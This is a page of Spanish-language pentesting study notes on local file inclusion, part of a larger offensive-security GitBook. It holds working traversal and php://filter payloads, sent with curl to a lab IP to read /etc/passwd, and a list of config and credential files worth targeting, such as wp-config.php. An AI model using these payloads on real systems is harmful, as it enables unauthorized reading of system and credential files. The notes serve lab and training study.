Notas
  • Introduction
  • Active Directory
    • BloodHound
    • Bypassing
    • Enumeration
    • Groups
    • Methodology
    • Msfvenom
    • Pivoting
    • Privesc
  • CMS
    • Jenkins
    • wordpress
  • CVEs
    • CVE-2017-0199
    • CVE-2019-1414
    • CVE-2021-42287
    • CVE-2021-44228
  • Common Ports
    • DNS - 53
    • LDAP - 389
    • MSSQL - 1433
    • NFS - 2049
    • RPC - 135
    • SMB - 445
    • VNC - 5900
    • ftp-21
    • kerberos-88
    • msrpc-5722
    • mysql-3306
    • rdp-3389
    • redis-6379
    • smtp-25
    • snmp-161
    • squid-3128
    • winrm-5985
  • EXTRA
    • BruteForce
    • Criptography
    • Extra
    • Fuzzing
    • Mounts
    • RevShells
  • Pentesting Android
    • Basic
  • Pentesting Web
    • IIS
    • LFI
    • OWASP TOP 10
    • Padding Oracle Attack
    • SSRF
    • SSTI
    • XSS
  • Pivoting
    • Remote Port Fowarding
    • Remote commands
  • SQLi
    • Conditional-based
    • Enumeration
    • Error-based
    • SQLite
    • Time-based
  • linux
    • Escalada
    • common-vulns
    • docker-breakout
    • ip-tables
    • port-forwarding
    • port-knocking
    • privesc
    • reversing
    • samba
  • scripting
    • Bash
    • PHP
    • Powershell
    • Python
Powered by GitBook
On this page
  • Directory Path Traversal Simple
  • Wrappers
  • Codificación en base64
  • Archivos de interés
  • Interfaces
  • Puertos internos
  • Conversión a decimal
  • Configuración Apache2
  • Configuración del Nginx
  • Configuración del Wordpress
  • Configuración del SQUID Proxy
  1. Pentesting Web

LFI

Directory Path Traversal Simple

curl -s -X GET 'http://10.10.11.135/image.php?img=../../../../../../../etc/passwd'

Wrappers

Codificación en base64

curl -s -X GET 'http://10.10.11.135/image.php?img=php://filter/convert.base64_encode/resource=/etc/passwd'

Archivos de interés

Interfaces

/proc/net/fib_trie

Puertos internos

/proc/net/tcp

Conversión a decimal

for port in 0016 20FB 0CEA AE9A 0035; do echo "$((0x$port))"; done

Configuración Apache2

/etc/apache2/sites-enabled/000-default.conf

Configuración del Nginx

/etc/nginx/nginx.conf

Configuración del Wordpress

wp-config.php

Configuración del SQUID Proxy

/etc/squid/squid.conf
PreviousIISNextOWASP TOP 10

Last updated 1 year ago